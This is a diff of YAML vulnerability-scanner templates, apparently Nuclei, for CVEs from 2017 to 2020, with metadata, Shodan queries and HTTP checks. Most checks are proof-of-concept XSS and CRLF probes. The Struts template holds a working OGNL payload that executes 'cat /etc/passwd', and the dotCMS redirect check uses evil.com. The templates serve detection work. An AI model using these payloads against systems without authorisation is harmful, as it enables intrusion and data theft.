cve-id: CVE-2017-11165
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
shodan-query: http.title:"datataker"
|
||||
verified: "true"
|
||||
tags: lfr,edb,cve,cve2017,datataker,config,packetstorm,exposure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/services/getFile.cmd?userfile=config.xml"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "COMMAND_SERVER"
|
||||
- "<loggerSettings>"
|
||||
- "config id=\"config"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/xml"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,44 @@
|
|||
id: CVE-2017-14186
|
||||
|
||||
info:
|
||||
name: FortiGate FortiOS SSL VPN Web Portal - Cross-Site Scripting
|
||||
author: johnk3r
|
||||
severity: medium
|
||||
description: |
|
||||
FortiGate FortiOS through SSL VPN Web Portal contains a cross-site scripting vulnerability. The login redir parameter is not santized, so an attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks such as a URL redirect. Affected versions are 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, and 5.4 and below.
|
||||
reference:
|
||||
- https://www.fortiguard.com/psirt/FG-IR-17-242
|
||||
- https://fortiguard.com/advisory/FG-IR-17-242
|
||||
- https://web.archive.org/web/20210801135714/http://www.securitytracker.com/id/1039891
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-14186
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 5.4
|
||||
cve-id: CVE-2017-14186
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
shodan-query: port:10443 http.favicon.hash:945408572
|
||||
verified: "true"
|
||||
tags: cve,cve2017,fortigate,xss,fortinet
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/remote/loginredir?redir=javascript:alert(document.domain)"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'location=decodeURIComponent("javascript%3Aalert%28document.domain%29"'
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2023/01/11
|
|
@ -1,38 +0,0 @@
|
|||
id: CVE-2017-14186
|
||||
|
||||
info:
|
||||
name: FortiGate SSL VPN Web Portal - Cross Site Scripting
|
||||
author: johnk3r
|
||||
severity: medium
|
||||
description: |
|
||||
Failure to sanitize the login redir parameter in the SSL-VPN web portal may allow an attacker to perform a Cross-site Scripting (XSS) or an URL Redirection attack.
|
||||
reference:
|
||||
- https://www.fortiguard.com/psirt/FG-IR-17-242
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-14186
|
||||
classification:
|
||||
cve-id: CVE-2017-14186
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: port:10443 http.favicon.hash:945408572
|
||||
tags: cve,cve2017,fortigate,xss,fortinet
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/remote/loginredir?redir=javascript:alert(document.domain)"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'location=decodeURIComponent("javascript%3Aalert%28document.domain%29"'
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -4,32 +4,36 @@ info:
|
|||
name: Apache Struts 2 - Remote Command Execution
|
||||
author: Random_Robbie
|
||||
severity: critical
|
||||
description: Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 is vulnerable to remote command injection attacks through incorrectly parsing an attacker's invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
|
||||
description: |
|
||||
Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 is vulnerable to remote command injection attacks through incorrectly parsing an attacker's invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
|
||||
reference:
|
||||
- https://github.com/mazen160/struts-pwn
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-5638
|
||||
- https://isc.sans.edu/diary/22169
|
||||
- https://github.com/rapid7/metasploit-framework/issues/8064
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-5638
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 10
|
||||
cve-id: CVE-2017-5638
|
||||
cwe-id: CWE-20
|
||||
tags: apache,kev,msf,cve,cve2017,struts,rce
|
||||
metadata:
|
||||
shodan-query: html:"Apache Struts"
|
||||
verified: "true"
|
||||
tags: cve,cve2017,apache,kev,msf,struts,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
|
||||
Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Hacker','Bounty Plz')}.multipart/form-data
|
||||
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
|
||||
Content-Type: %{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#cmd="cat /etc/passwd",#cmds={"/bin/bash","-c",#cmd},#p=new java.lang.ProcessBuilder(#cmds),#p.redirectErrorStream(true),#process=#p.start(),#b=#process.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#rw=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#rw.println(#e),#rw.flush())}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "X-Hacker: Bounty Plz"
|
||||
part: header
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
# Enhanced by mp on 2022/04/26
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
|
|
@ -18,7 +18,7 @@ info:
|
|||
- http://www.openwall.com/lists/oss-security/2017/04/16/2
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-7615
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 8.8
|
||||
cve-id: CVE-2017-7615
|
||||
cwe-id: CWE-640
|
||||
|
|
|
@ -9,7 +9,7 @@ info:
|
|||
reference:
|
||||
- https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-8917
|
||||
- http://www.securitytracker.com/id/1038522
|
||||
- https://web.archive.org/web/20211207050608/http://www.securitytracker.com/id/1038522
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
|
|
@ -0,0 +1,49 @@
|
|||
id: CVE-2018-11227
|
||||
|
||||
info:
|
||||
name: Monstra CMS V3.0.4 - Cross-Site Scripting
|
||||
author: ritikchaddha
|
||||
severity: medium
|
||||
description: |
|
||||
Monstra CMS 3.0.4 and earlier has XSS via index.php.
|
||||
reference:
|
||||
- https://github.com/monstra-cms/monstra/issues/438
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-11227
|
||||
- https://www.exploit-db.com/exploits/44646
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2018-11227
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
shodan-query: http.favicon.hash:419828698
|
||||
verified: "true"
|
||||
tags: cve,cve2018,xss,mostra,mostracms,cms,edb
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /admin/index.php?id=pages HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
login="><svg/onload=alert(document.domain)>&password=xxxxxx&login_submit=Log+In
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "><svg/onload=alert(document.domain)>"
|
||||
- "Monstra"
|
||||
condition: and
|
||||
case-insensitive: true
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,63 @@
|
|||
id: CVE-2018-11473
|
||||
|
||||
info:
|
||||
name: Monstra CMS V3.0.4 - Cross-Site Scripting
|
||||
author: ritikchaddha
|
||||
severity: medium
|
||||
description: |
|
||||
Monstra CMS 3.0.4 has XSS in the registration Form (i.e., the login parameter to users/registration).
|
||||
reference:
|
||||
- https://github.com/monstra-cms/monstra/issues/446
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-11473
|
||||
- https://github.com/nikhil1232/Monstra-CMS-3.0.4-XSS-ON-Registration-Page
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2018-11473
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
shodan-query: http.favicon.hash:419828698
|
||||
verified: "true"
|
||||
tags: cve,cve2018,xss,mostra,mostracms,cms
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /users/registration HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
POST /users/registration HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
csrf={{csrf}}&login=test&password=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&email=teest%40gmail.com&answer=test®ister=Register
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "><script>alert(document.domain)</script>"
|
||||
- "Monstra"
|
||||
condition: and
|
||||
case-insensitive: true
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: csrf
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- 'id="csrf" name="csrf" value="(.*)">'
|
||||
internal: true
|
|
@ -0,0 +1,37 @@
|
|||
id: CVE-2018-16979
|
||||
|
||||
info:
|
||||
name: Monstra CMS V3.0.4 - HTTP Header Injection
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: |
|
||||
Monstra CMS V3.0.4 allows HTTP header injection in the plugins/captcha/crypt/cryptographp.php cfg parameter.
|
||||
reference:
|
||||
- https://github.com/howchen/howchen/issues/4
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-16979
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2018-16979
|
||||
cwe-id: CWE-113
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2018,crlf,mostra,mostracms,cms
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/plugins/captcha/crypt/cryptographp.php?cfg=1%0D%0ASet-Cookie:%20crlfinjection=1"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'new line detected in'
|
||||
- 'cryptographp.php'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -7,9 +7,9 @@ info:
|
|||
description: Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute JavaScript which could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.
|
||||
reference:
|
||||
- https://github.com/vulhub/vulhub/blob/master/kibana/CVE-2018-17246/README.md
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-17246
|
||||
- https://www.elastic.co/community/security
|
||||
- https://discuss.elastic.co/t/elastic-stack-6-4-3-and-5-6-13-security-update/155594
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-17246
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
@ -41,3 +41,5 @@ requests:
|
|||
part: header
|
||||
words:
|
||||
- "application/json"
|
||||
|
||||
# Enhanced by mp on 2023/01/15
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2018-17422
|
||||
|
||||
info:
|
||||
name: dotCMS <5.0.2 - Open Redirect
|
||||
name: DotCMS < 5.0.2 - Open Redirect
|
||||
author: 0x_Akoko,daffainfo
|
||||
severity: medium
|
||||
description: |
|
||||
|
@ -16,27 +16,22 @@ info:
|
|||
cve-id: CVE-2018-17422
|
||||
cwe-id: CWE-601
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.title:"dotCMS"
|
||||
verified: "true"
|
||||
tags: cve,cve2018,redirect,dotcms
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://www.interact.sh'
|
||||
- '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=interact.sh'
|
||||
- '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://evil.com'
|
||||
- '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=evil.com'
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "self.location = 'http://www.interact.sh'"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- "self.location = 'http://evil.com'"
|
||||
- "location.href = 'http\\x3a\\x2f\\x2fwww\\x2eevil\\x2ecom'"
|
||||
|
||||
# Enhanced by md on 2022/10/13
|
||||
|
|
|
@ -11,7 +11,7 @@ info:
|
|||
- https://nvd.nist.gov/vuln/detail/CVE-2018-17431
|
||||
- https://github.com/Fadavvi/CVE-2018-17431-PoC#confirmation-than-bug-exist-2018-09-25-ticket-id-xwr-503-79437
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2018-17431
|
||||
cwe-id: CWE-287
|
||||
|
|
|
@ -3,15 +3,15 @@ id: CVE-2018-19365
|
|||
info:
|
||||
name: Wowza Streaming Engine Manager 4.7.4.01 - Directory Traversal
|
||||
author: 0x_Akoko
|
||||
severity: high
|
||||
severity: critical
|
||||
description: Wowza Streaming Engine 4.7.4.01 allows traversal of the directory structure and retrieval of a file via a remote, specifically crafted HTTP request to the REST API.
|
||||
reference:
|
||||
- https://blog.gdssecurity.com/labs/2019/2/11/wowza-streaming-engine-manager-directory-traversal-and-local.html
|
||||
- https://www.cvedetails.com/cve/CVE-2018-19365
|
||||
- https://raw.githubusercontent.com/WowzaMediaSystems/public_cve/main/wowza-streaming-engine/CVE-2018-19365.txt
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
|
||||
cvss-score: 9.1
|
||||
cve-id: CVE-2018-19365
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2018,wowza,lfi
|
||||
|
|
|
@ -1,10 +1,10 @@
|
|||
id: CVE-2019-12616
|
||||
|
||||
info:
|
||||
name: phpMyAdmin < 4.9.0 - CSRF
|
||||
name: phpMyAdmin <4.9.0 - Cross-Site Request Forgery
|
||||
author: Mohammedsaneem,philippedelteil,daffainfo
|
||||
severity: medium
|
||||
description: A vulnerability was found that allows an attacker to trigger a CSRF attack against a phpMyAdmin user. The attacker can trick the user, for instance through a broken <img> tag pointing at the victim's phpMyAdmin database, and the attacker can potentially deliver a payload (such as a specific INSERT or DELETE statement) through the victim.
|
||||
description: phpMyAdmin before 4.9.0 is susceptible to cross-site request forgery. An attacker can utilize a broken <img> tag which points at the victim's phpMyAdmin database, thus leading to potential delivery of a payload, such as a specific INSERT or DELETE statement.
|
||||
reference:
|
||||
- https://www.phpmyadmin.net/security/PMASA-2019-4/
|
||||
- https://www.exploit-db.com/exploits/46982
|
||||
|
@ -50,3 +50,5 @@ requests:
|
|||
group: 1
|
||||
regex:
|
||||
- '\?v=([0-9.]+)'
|
||||
|
||||
# Enhanced by md on 2023/01/11
|
||||
|
|
|
@ -1,16 +1,16 @@
|
|||
id: CVE-2019-14530
|
||||
|
||||
info:
|
||||
name: OpenEMR < 5.0.2 - Path Traversal
|
||||
name: OpenEMR <5.0.2 - Local File Inclusion
|
||||
author: TenBird
|
||||
severity: high
|
||||
description: |
|
||||
An issue was discovered in custom/ajax_download.php in OpenEMR before 5.0.2 via the fileName parameter. An attacker can download any file (that is readable by the user www-data) from server storage. If the requested file is writable for the www-data user and the directory /var/www/openemr/sites/default/documents/cqm_qrda/ exists, it will be deleted from server.
|
||||
OpenEMR before 5.0.2 is vulnerable to local file inclusion via the fileName parameter in custom/ajax_download.php. An attacker can download any file (that is readable by the web server user) from server storage. If the requested file is writable for the web server user and the directory /var/www/openemr/sites/default/documents/cqm_qrda/ exists, the file will be deleted from server.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/50037
|
||||
- https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_7.zip
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-14530
|
||||
- https://github.com/openemr/openemr/pull/2592
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-14530
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 8.8
|
||||
|
@ -50,3 +50,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2023/01/15
|
||||
|
|
|
@ -2,9 +2,10 @@ id: CVE-2019-15501
|
|||
|
||||
info:
|
||||
name: L-Soft LISTSERV <16.5-2018a - Cross-Site Scripting
|
||||
author: LogicalHunter
|
||||
author: LogicalHunter,arafatansari
|
||||
severity: medium
|
||||
description: L-Soft LISTSERV before 16.5-2018a contains a reflected cross-site scripting vulnerability via the /scripts/wa.exe OK parameter.
|
||||
description: |
|
||||
L-Soft LISTSERV before 16.5-2018a contains a reflected cross-site scripting vulnerability via the /scripts/wa.exe OK parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/47302
|
||||
- http://www.lsoft.com/manuals/16.5/LISTSERV16.5-2018a_WhatsNew.pdf
|
||||
|
@ -14,6 +15,9 @@ info:
|
|||
cvss-score: 6.1
|
||||
cve-id: CVE-2019-15501
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
shodan-query: http.html:"LISTSERV"
|
||||
verified: "true"
|
||||
tags: cve,cve2019,xss,listserv,edb
|
||||
|
||||
requests:
|
||||
|
@ -24,9 +28,12 @@ requests:
|
|||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '</script><script>alert(document.domain)</script>'
|
||||
part: body
|
||||
- 'LISTSERV'
|
||||
condition: and
|
||||
case-insensitive: true
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
|
|
|
@ -9,7 +9,7 @@ info:
|
|||
- https://www.tenable.com/security/research/tra-2019-03
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-3911
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2019-3911
|
||||
cwe-id: CWE-79
|
||||
|
|
|
@ -10,7 +10,7 @@ info:
|
|||
- https://www.cvedetails.com/cve/CVE-2019-3912
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-3912
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2019-3912
|
||||
cwe-id: CWE-601
|
||||
|
|
|
@ -0,0 +1,32 @@
|
|||
id: CVE-2019-6802
|
||||
|
||||
info:
|
||||
name: Pypiserver 1.2.5 - CRLF Injection
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: |
|
||||
CRLF Injection in pypiserver 1.2.5 and below allows attackers to set arbitrary HTTP headers and possibly conduct XSS attacks via a %0d%0a in a URI
|
||||
reference:
|
||||
- https://vuldb.com/?id.130257
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-6802
|
||||
- https://github.com/pypiserver/pypiserver/issues/237
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2019-6802
|
||||
cwe-id: CWE-79,CWE-74
|
||||
metadata:
|
||||
shodan-query: html:"pypiserver"
|
||||
verified: "true"
|
||||
tags: cve,cve2019,crlf,generic,pypiserver
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/%0d%0aSet-Cookie:crlfinjection=1;"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'Set-Cookie: crlfinjection=1;'
|
|
@ -7,9 +7,10 @@ info:
|
|||
description: Grafana through 6.7.1 contains an unauthenticated stored cross-site scripting vulnerability due to insufficient input protection in the originalUrl field, which allows an attacker to inject JavaScript code that will be executed after clicking on Open Original Dashboard after visiting the snapshot.
|
||||
reference:
|
||||
- https://web.archive.org/web/20210717142945/https://ctf-writeup.revers3c.com/challenges/web/CVE-2020-11110/index.html
|
||||
- https://github.com/grafana/grafana/blob/master/CHANGELOG.md
|
||||
- https://github.com/grafana/grafana/pull/23254
|
||||
- https://security.netapp.com/advisory/ntap-20200810-0002/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-11110
|
||||
- https://hackerone.com/reports/1329433
|
||||
remediation: This issue can be resolved by updating Grafana to the latest version.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
|
@ -18,7 +19,8 @@ info:
|
|||
cwe-id: CWE-79
|
||||
metadata:
|
||||
shodan-query: title:"Grafana"
|
||||
tags: cve,cve2020,xss,grafana
|
||||
tags: cve,cve2020,xss,grafana,hackerone
|
||||
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -5,6 +5,9 @@ info:
|
|||
author: x6263
|
||||
severity: medium
|
||||
description: PRTG Network Monitor before 20.1.57.1745 allows remote unauthenticated attackers to obtain information about probes running or the server itself via an HTTP request.
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: title:"prtg"
|
||||
reference:
|
||||
- https://github.com/ch-rigu/CVE-2020-11547--PRTG-Network-Monitor-Information-Disclosure
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-11547
|
||||
|
@ -21,7 +24,9 @@ requests:
|
|||
path:
|
||||
- "{{BaseURL}}/public/login.htm?type=probes"
|
||||
- "{{BaseURL}}/public/login.htm?type=requests"
|
||||
- "{{BaseURL}}/public/login.htm?type=treestat"
|
||||
|
||||
stop-at-first-match: true
|
||||
req-condition: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
@ -33,6 +38,9 @@ requests:
|
|||
part: body
|
||||
words:
|
||||
- "prtg_network_monitor"
|
||||
- "Probes"
|
||||
- "Groups"
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -15,7 +15,7 @@ info:
|
|||
- https://nvd.nist.gov/vuln/detail/CVE-2020-14408
|
||||
metadata:
|
||||
verified: true
|
||||
tags: cve,cve2022,cockpit,agentejo,xss,oss
|
||||
tags: cve,cve2020,cockpit,agentejo,xss,oss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -5,7 +5,7 @@ info:
|
|||
author: edoardottt
|
||||
severity: critical
|
||||
description: |
|
||||
Sourcecodester Hotel and Lodge Management System 2.0 is vulnerable to unauthenticated SQL injection and can allow remote attackers to execute arbitrary SQL commands via the email parameter to the edit page for Customer, Room, Currency, Room Booking Details, or Tax Details.
|
||||
Sourcecodester Hotel and Lodge Management System 2.0 contains a SQL injection vulnerability via the email parameter to the edit page for Customer, Room, Currency, Room Booking Details, or Tax Details. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://github.com/hitIer/web_test/tree/master/hotel
|
||||
- https://www.sourcecodester.com/php/13707/hotel-and-lodge-management-system.html
|
||||
|
@ -35,3 +35,5 @@ requests:
|
|||
- 'status_code == 200'
|
||||
- 'contains(body, "Hotel Booking System")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/12/08
|
||||
|
|
|
@ -0,0 +1,65 @@
|
|||
id: CVE-2020-23697
|
||||
|
||||
info:
|
||||
name: Monstra CMS V3.0.4 - Cross-Site Scripting
|
||||
author: ritikchaddha
|
||||
severity: medium
|
||||
description: |
|
||||
Cross Site Scripting vulnerabilty in Monstra CMS 3.0.4 via the 'page' feature in admin/index.php.
|
||||
reference:
|
||||
- https://github.com/monstra-cms/monstra/issues/463
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-23697
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 5.4
|
||||
cve-id: CVE-2020-23697
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2020,xss,mostra,mostracms,cms,authenticated
|
||||
|
||||
variables:
|
||||
string: "{{to_lower('{{randstr}}')}}"
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /admin/index.php?id=dashboard HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
login={{username}}&password={{password}}&login_submit=Log+In
|
||||
|
||||
- |
|
||||
GET /admin/index.php?id=pages&action=add_page HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
- |
|
||||
POST /admin/index.php?id=pages&action=add_page HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
csrf={{csrf}}&page_title=%22%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&page_name={{string}}&page_meta_title=&page_keywords=&page_description=&pages=0&templates=index&status=published&access=public&editor=test&page_tags=&add_page_and_exit=Save+and+Exit&page_date=2023-01-09+18%3A22%3A15
|
||||
|
||||
- |
|
||||
GET /{{string}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(all_headers_4, "text/html")'
|
||||
- 'status_code_4 == 200'
|
||||
- 'contains(body_4, "><script>alert(document.domain)</script>") && contains(body_4, "Monstra")'
|
||||
condition: and
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: csrf
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- 'id="csrf" name="csrf" value="(.*)">'
|
||||
internal: true
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2020-24902
|
||||
|
||||
info:
|
||||
name: Quixplorer <=2.4.1 - Cross Site Scripting
|
||||
name: Quixplorer <=2.4.1 - Cross-Site Scripting
|
||||
author: edoardottt
|
||||
severity: medium
|
||||
description: |
|
||||
Quixplorer <=2.4.1 is vulnerable to reflected cross-site scripting (XSS) caused by improper validation of user supplied input. A remote attacker could exploit this vulnerability using a specially crafted URL to execute a script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.
|
||||
